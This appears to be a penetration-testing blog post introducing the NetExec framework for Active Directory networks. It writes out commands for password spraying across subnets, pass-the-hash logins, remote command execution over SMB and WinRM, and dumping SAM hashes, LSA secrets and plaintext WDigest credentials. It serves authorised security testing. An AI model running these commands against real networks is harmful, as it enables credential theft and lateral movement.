/ Exploitation, Uncategorized / By

NetExec:

NetExec (formerly known as CrackMapExec or CME) is a powerful post-exploitation framework used by penetration testers and red teamers to automate the enumeration and exploitation of network protocols, particularly in Active Directory environments.

It’s the tool you reach for when you have credentials and want to move fast — from validating access to enumerating shares, executing commands, dumping secrets, and even pivoting laterally.

What Is NetExec?

NetExec is a network situational awareness tool designed to simplify common tasks during internal pentests. It supports protocols like:

  • SMB (445)
  • WinRM (5985/5986)
  • RDP (3389)
  • MSSQL (1433)
  • SSH (22)
  • LDAP (389/636)
  • Kerberos (88)
  • and more…

It allows for credential validation, command execution, file uploads, password spraying, and more — across an entire subnet.

Think of it as a Swiss Army knife for Windows network protocols.

NetExec Is the Successor to CrackMapExec

NetExec is a community-driven fork and complete rewrite of CrackMapExec (CME). While CME was incredibly popular, it is now deprecated and unmaintained.

Why the change?

  • The name CrackMapExec triggered antivirus, firewalls, and policy issues due to the word “crack.”
  • The project slowed down and lacked modern protocol support.
  • NetExec was created to revive, modernize, and extend everything CME did — but faster, cleaner, and actively supported.

If you’ve used CME in the past, switching to NetExec is seamless — same syntax, but with more speed and more features.

Installation

# Recommended install via pipx
pipx install git+https://github.com/Pennyw0rth/NetExec

# Or clone and install locally
git clone https://github.com/Pennyw0rth/NetExec
cd NetExec
pip install -r requirements.txt

Basic Usage

netexec <protocol> <target> -u <user> -p <password>

Examples:

# Check if credentials work via SMB
netexec smb 10.10.10.0/24 -u administrator -p Passw0rd!

# Check WinRM access
netexec winrm 10.10.10.5 -u jdoe -p Summer2024

# Use hash instead of password
netexec smb 10.10.10.5 -u admin -H aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Modules: Making It Powerful

NetExec uses modules to perform specific actions once it authenticates.

You can list available modules like this:

netexec smb -M

Then run a module:

netexec smb 10.10.10.5 -u admin -p password123 -M shares

Popular modules include:

  • shares – List accessible SMB shares
  • sessions – See logged-in users
  • exec – Execute a command
  • psexec – Run commands via service creation
  • sam – Dump local SAM hashes
  • lsa – Dump LSA secrets
  • wdigest – Dump plaintext creds from memory
  • kerberos – Kerberos ticket abuse (AS-REP, Kerberoasting)
  • winrm_exec – Run PowerShell via WinRM

Common SMB Commands for Pentesters

# Enumerate shares
netexec smb 10.10.10.5 -u user -p pass -M shares

# Command execution (if user has admin)
netexec smb 10.10.10.5 -u user -p pass -M exec -o COMMAND="whoami"

# Dump SAM
netexec smb 10.10.10.5 -u user -p pass -M sam

# Dump LSA secrets
netexec smb 10.10.10.5 -u user -p pass -M lsa

# Dump plaintext credentials (Wdigest)
netexec smb 10.10.10.5 -u user -p pass -M wdigest

Spray Across Entire Subnets

# Password spray across 192.168.1.0/24
netexec smb 192.168.1.0/24 -u admin -p Welcome123!

# Spray with user and password lists
netexec smb 192.168.1.0/24 -u users.txt -p passwords.txt

Add --continue-on-success if you want to keep spraying after finding valid creds.

Credential Validation Use Case

Quickly check if a credential works across many systems:

netexec smb 192.168.1.0/24 -u corpuser -p Winter2024! --shares

Or validate hashes:

netexec smb 192.168.1.0/24 -u corpuser -H :8846f7eaee8fb117ad06bdd830b7586c

WinRM: Clean Execution for Blue-Team-Aware Environments

# Execute PowerShell over WinRM
netexec winrm 10.10.10.5 -u jsmith -p P@ssword1 -M exec -o COMMAND='ipconfig'

This is useful in environments where SMB is noisy or locked down.

Custom Output

NetExec supports output in different formats:

--output output.csv --output-format csv

Also supports JSON and greppable formats.

Final Tips for Pentesters

  • Combine NetExec with Kerbrute, GetNPUsers.py, and BloodHound for full AD coverage.
  • Use --local-auth for local admin credential checks.
  • Start with enumeration modules like shares, sessions, and users, then move to execution.
  • Use --no-bruteforce to reduce noise during engagements.

Conclusion

NetExec replaces CrackMapExec as the modern, flexible, and actively maintained framework for internal network exploitation. With wide protocol support, powerful modules, and clean output, it’s a must-have tool in any pentester’s arsenal.

If you’re still using CME — upgrade. NetExec is faster, cleaner, and built for the environments we face today.

Related Posts

Scroll to Top